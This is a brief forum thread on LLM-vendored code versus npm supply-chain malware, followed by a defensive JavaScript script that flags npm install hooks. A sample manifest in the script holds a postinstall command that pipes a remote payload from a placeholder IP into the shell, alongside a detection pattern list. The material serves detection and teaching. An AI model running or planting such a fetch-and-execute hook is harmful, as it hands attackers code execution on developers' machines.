by swiftcoder 23 days ago
> I think it's not a terrible approach with all the updating dependency malware issues with stuff like NPM

I think in this instance, the only thing worse than a zero-day in your dependency tree is a zero-day you don't know your LLM vendored directly into your codebase...

1 comment

Personally, I feel a vulnerability in local code (unshared AI slop) is much less likely to be exploited than, say, an npm package update that will pwn you as soon as it loads up.
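The "pwn you as soon as it loads up" case above is, in practice, an npm lifecycle script: a package can declare `preinstall`, `install`, `postinstall` or `prepare` hooks that npm executes during `npm install`, before any of your own code ever imports the package. The following is an added example (not from the thread or either commenter) that lists those auto-run hooks in a set of constructed `package.json` manifests and flags commands that fetch or decode remote content. The hook names are npm's documented lifecycle events; the suspicious-substring list is this example's own heuristic, not an npm API.

```javascript
// Added example (not code from the thread). Inspect package.json manifests for
// the lifecycle hooks npm runs automatically on install, which is the point at
// which a malicious package update gets code execution on a developer machine.

// Hooks npm runs on its own during `npm install` (prepare applies to the root
// package and git dependencies). Assumed from npm's documented lifecycle.
const AUTO_RUN_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic patterns chosen for this example; a real audit would tune these.
const SUSPICIOUS_PATTERNS = [/\bcurl\s/, /\bwget\s/, /\bnode\s+-e\b/, /https?:\/\//, /base64/];

// Parse one manifest and return every auto-run hook it declares.
function findInstallScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of AUTO_RUN_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd === "string" && cmd.trim() !== "") {
      findings.push({
        name: pkg.name,
        version: pkg.version,
        hook,
        command: cmd,
        suspicious: SUSPICIOUS_PATTERNS.some((re) => re.test(cmd)),
      });
    }
  }
  return findings;
}

// Audit several manifests at once (e.g. every package.json under node_modules).
function auditAll(manifestTexts) {
  return manifestTexts.flatMap(findInstallScripts);
}

// Constructed sample manifests for this example; none refer to a real package.
const SAMPLE_BENIGN = JSON.stringify({
  name: "example-plain-lib",
  version: "1.0.0",
  scripts: { test: "node test.js" },
});
const SAMPLE_NATIVE = JSON.stringify({
  name: "example-native-addon",
  version: "2.1.0",
  scripts: { install: "node-gyp rebuild" },
});
const SAMPLE_SUSPICIOUS = JSON.stringify({
  name: "example-suspicious-pkg",
  version: "1.0.1",
  scripts: { postinstall: "curl -s https://203.0.113.5/payload | sh" },
});

// Stand-alone run: print the findings for the three constructed manifests.
for (const f of auditAll([SAMPLE_BENIGN, SAMPLE_NATIVE, SAMPLE_SUSPICIOUS])) {
  const tag = f.suspicious ? "SUSPICIOUS" : "review";
  console.log(`[${tag}] ${f.name}@${f.version} ${f.hook}: ${f.command}`);
}
```

A native addon legitimately uses an `install` hook (`node-gyp rebuild`), so the audit reports it for review rather than as suspicious; the point is to see every auto-run hook, not to auto-block. The blunt mitigation is `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), after which the few packages that genuinely need a build step must be rebuilt deliberately.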